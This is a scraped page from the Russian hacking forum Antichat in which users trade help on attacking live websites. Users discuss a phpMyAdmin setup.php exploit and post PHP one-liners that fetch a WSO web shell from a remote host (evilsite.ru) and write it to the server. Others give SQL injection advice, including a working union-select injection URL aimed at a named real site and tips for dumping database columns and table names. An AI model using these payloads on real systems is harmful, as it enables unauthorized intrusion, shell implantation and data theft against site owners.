HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18131  
Старый 18.09.2011, 02:05
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от Sloneny  
С помощью эксплойта через phpMyAdmin/scripts/setup.php
выводит
phpinfo();
allow_url_fopen on

magic_quotes_gpc on

при попытке залить полноценный шелл с помощью такой конструкции
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wso.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'http://www.*********.com/wso/******.txt'[/COLOR][COLOR="#007700"]));[/COLOR][/COLOR
одинарная кавычка экранируется обратным слешем \'
тестил на другом сайте с такими же вышеуказанными параметрами шелл все равно заливается 8-0
пытался кавычку, часть запроса или весь запрос хексить и чарить, не помогло
Подскажите пожалуйста где я ошибся, и каким еще образом можно попытаться обойти экранирование
и залить полноценный шелл.
просто stripslashes делай
 
Ответить с цитированием

  #18132  
Старый 18.09.2011, 02:13
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]]));&[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]wso[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//evilsite.ru/shell.txt[/COLOR][/COLOR] 
 
Ответить с цитированием

  #18133  
Старый 18.09.2011, 02:36
Sloneny
Новичок
Регистрация: 08.03.2010
Сообщений: 0
С нами: 8515014

Репутация: 0
По умолчанию

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]]));&[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]wso[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//evilsite.ru/shell.txt[/COLOR][/COLOR] 
как ни старался не сработало

Совсем забыл написать, в эксплойте используется такая конструкция

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
при попытке заменить ее на что либо другое, или матерится или выдает пустую страницу

Никак не могу найти примера работы с stripslashes()

везде написано что он удаляет экранирование символов

но как его применить?

К сожалению с php не очень дружу
 
Ответить с цитированием

  #18134  
Старый 18.09.2011, 05:38
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

2Sloneny скинул решение в ПМ, посмотри если выйдет то опишу тут полноценно.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #18135  
Старый 18.09.2011, 06:01
sourcec0de
Новичок
Регистрация: 13.06.2011
Сообщений: 27
С нами: 7850486

Репутация: 7
По умолчанию

Цитата:
Сообщение от rad_scorp  
друзья, только начинаю знакомство с sql injection, нашел один сайт без проверки на простейшую инъекцию. Если %27, то:
Код:
DB Error: syntax error 
SELECT login, password FROM emps WHERE login = '' or 1=1 --' 
[nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2]
После коментария пробел поставь
 
Ответить с цитированием

  #18136  
Старый 19.09.2011, 00:12
Samael91
Познающий
Регистрация: 02.12.2010
Сообщений: 38
С нами: 8128406

Репутация: 0
По умолчанию

есть скуля

Код:
http://www.feb.spb.ru/news.php?id=100+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+limit+1,1111--
хочу сдампить колонки БД с помощью программы rsaUnDumper[sql] 2.0.exe

делаю все как положено

Цитата:
Сообщение от None  
GET http://www.feb.spb.ru/news.php?id=100+union+select+1,,3,4,5,6,7+from+inf ormation_schema.columns+limit+,1111-- HTTP/1.0 User-Agent: Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53 Host: www.*****.ru Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: identity, *;q=0
но ничего не дампиться даже ошибки не выводятся

просто выводится

Цитата:
Сообщение от None  
Запросов 10 сохранено 0 ошибок 0
Пробовал запрос без --, пробовал удалять все что ниже --

безрезультатно

А в ручную все идет нормально.

Подскажите что я не так делаю?

Ссылка на дампер http://www.sendspace.com/file/ee74kx
 
Ответить с цитированием

  #18137  
Старый 19.09.2011, 01:52
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию

Цитата:
Сообщение от Samael91  
есть скуля
Код:
http://www.feb.spb.ru/news.php?id=100+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+limit+1,1111--
хочу сдампить колонки БД с помощью программы rsaUnDumper[sql] 2.0.exe
делаю все как положено
но ничего не дампиться даже ошибки не выводятся
просто выводится
Пробовал запрос без --, пробовал удалять все что ниже --
безрезультатно
А в ручную все идет нормально.
Подскажите что я не так делаю?
Ссылка на дампер http://www.sendspace.com/file/ee74kx
забей сылку в sqlmap,Havij или руками делай запрос!(честно не вижу смысла в этих дамперах)
 
Ответить с цитированием

  #18138  
Старый 19.09.2011, 02:27
rad_scorp
Новичок
Регистрация: 09.09.2011
Сообщений: 12
С нами: 7723766

Репутация: 1
По умолчанию

Цитата:
Сообщение от sourcec0de  
После коментария пробел поставь
Спасибо, чувак, ты прав, учту. Но базы там покорраптило в хлам. Будем ждать, пока починят.
 
Ответить с цитированием

  #18139  
Старый 19.09.2011, 02:30
Киев
Новичок
Регистрация: 09.08.2011
Сообщений: 19
С нами: 7768406

Репутация: 4
По умолчанию

вот начал учить скуль иньекции

подскажите плиз как узнавать имена таблиц?

спасибо.
 
Ответить с цитированием

  #18140  
Старый 19.09.2011, 02:46
Юго
Познающий
Регистрация: 02.02.2011
Сообщений: 63
С нами: 8039126

Репутация: 17
По умолчанию

Цитата:
Сообщение от Киев  
вот начал учить скуль иньекции

подскажите плиз как узнавать имена таблиц?

спасибо.

ыы самый тяжелый способ это подбирать ручками, например users, admins, members и т.д. Еще есть проги для подбора таблиц по словарям. можно поискать на форуме

а вообще тут смотря к чему таблицы. Если к извесным форумам то таблицы извесны (если их не поменяли). Например таблица юзеров phpbb форума называется phpbb_users. Если это 5 версия Мускула или MSSQL то таблицы можно увидеть через information_schema.tables.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.